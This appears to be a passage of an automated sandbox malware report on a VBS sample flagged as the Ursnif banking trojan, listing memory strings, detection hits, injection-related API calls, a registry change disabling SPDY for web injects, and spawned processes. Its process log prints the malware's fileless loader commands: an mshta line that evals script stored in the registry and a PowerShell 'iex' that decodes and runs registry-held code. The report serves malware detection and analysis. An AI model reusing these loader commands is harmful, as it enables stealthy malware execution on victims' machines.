            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 00000023.00000000.372710070.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000023.00000002.489612892.00000000063F3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000015.00000003.310300551.00000267013E9000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000015.00000003.310590645.00000267015AF000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000015.00000003.309171435.0000026701057000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.342326677.00000000046E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270925261.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271044990.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.283759695.000000000530B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270893136.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271117901.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.473275595.000001776603E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.488542478.000000000613E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270863314.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.270967614.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271019633.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.271092585.0000000005488000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.348157353.00000267796D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.384731401.00000000059A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.477516114.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6356, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\explorer.exeCode function: 35_2_0612676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
            Source: C:\Windows\explorer.exeCode function: 35_2_0611FFCC NtMapViewOfSection,
            Source: C:\Windows\explorer.exeCode function: 35_2_0610CCA0 NtReadVirtualMemory,
            Source: C:\Windows\explorer.exeCode function: 35_2_0611AD14 NtQuerySystemInformation,
            Source: C:\Windows\explorer.exeCode function: 35_2_0611F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
            Source: C:\Windows\explorer.exeCode function: 35_2_0610BAB4 NtAllocateVirtualMemory,
            Source: C:\Windows\explorer.exeCode function: 35_2_06111AC4 NtQueryInformationProcess,
            Source: C:\Windows\explorer.exeCode function: 35_2_06113830 NtWriteVirtualMemory,
            Source: C:\Windows\explorer.exeCode function: 35_2_0611387C NtCreateSection,
            Source: C:\Windows\explorer.exeCode function: 35_2_0610B75C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611F770
            Source: C:\Windows\explorer.exeCode function: 35_2_0612676C
            Source: C:\Windows\explorer.exeCode function: 35_2_061037B8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612AFB8
            Source: C:\Windows\explorer.exeCode function: 35_2_06120034
            Source: C:\Windows\explorer.exeCode function: 35_2_0610C134
            Source: C:\Windows\explorer.exeCode function: 35_2_06119138
            Source: C:\Windows\explorer.exeCode function: 35_2_0610AE04
            Source: C:\Windows\explorer.exeCode function: 35_2_0612BEB0
            Source: C:\Windows\explorer.exeCode function: 35_2_061226B4
            Source: C:\Windows\explorer.exeCode function: 35_2_06109F98
            Source: C:\Windows\explorer.exeCode function: 35_2_061117B8
            Source: C:\Windows\explorer.exeCode function: 35_2_06105474
            Source: C:\Windows\explorer.exeCode function: 35_2_0610D460
            Source: C:\Windows\explorer.exeCode function: 35_2_06119CB0
            Source: C:\Windows\explorer.exeCode function: 35_2_061294B8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612A4BC
            Source: C:\Windows\explorer.exeCode function: 35_2_0611D4A8
            Source: C:\Windows\explorer.exeCode function: 35_2_06110CC0
            Source: C:\Windows\explorer.exeCode function: 35_2_061274CC
            Source: C:\Windows\explorer.exeCode function: 35_2_0610BCF8
            Source: C:\Windows\explorer.exeCode function: 35_2_06113CE0
            Source: C:\Windows\explorer.exeCode function: 35_2_0612B516
            Source: C:\Windows\explorer.exeCode function: 35_2_06106D08
            Source: C:\Windows\explorer.exeCode function: 35_2_0611B520
            Source: C:\Windows\explorer.exeCode function: 35_2_0611452C
            Source: C:\Windows\explorer.exeCode function: 35_2_06111D94
            Source: C:\Windows\explorer.exeCode function: 35_2_06123208
            Source: C:\Windows\explorer.exeCode function: 35_2_06128224
            Source: C:\Windows\explorer.exeCode function: 35_2_06107320
            Source: C:\Windows\explorer.exeCode function: 35_2_06108B5C
            Source: C:\Windows\explorer.exeCode function: 35_2_06118B4C
            Source: C:\Windows\explorer.exeCode function: 35_2_06119380
            Source: C:\Windows\explorer.exeCode function: 35_2_06102BC8
            Source: C:\Windows\explorer.exeCode function: 35_2_0610203C
            Source: C:\Windows\explorer.exeCode function: 35_2_0611B040
            Source: C:\Windows\explorer.exeCode function: 35_2_06126064
            Source: C:\Windows\explorer.exeCode function: 35_2_0612E080
            Source: C:\Windows\explorer.exeCode function: 35_2_061220F8
            Source: C:\Windows\explorer.exeCode function: 35_2_0612F940
            Source: C:\Windows\explorer.exeCode function: 35_2_06111174
            Source: C:\Windows\explorer.exeCode function: 35_2_061291A0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
            Source: 0k4Vu1eOEIhU.vbsInitial sample: Strings found which are bigger than 50
            Source: gf33rpcq.dll.29.drStatic PE information: No import functions for PE file found
            Source: 1b1iaete.dll.25.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\explorer.exeSection loaded: cryptdlg.dll
            Source: C:\Windows\explorer.exeSection loaded: msimg32.dll
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winVBS@29/40@7/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{4AA7BD5B-21EE-0C31-FB1E-E5005F32E934}
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0k4Vu1eOEIhU.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17422 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6360 CREDAT:17428 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3556.tmp' 'c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES45E1.tmp' 'c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
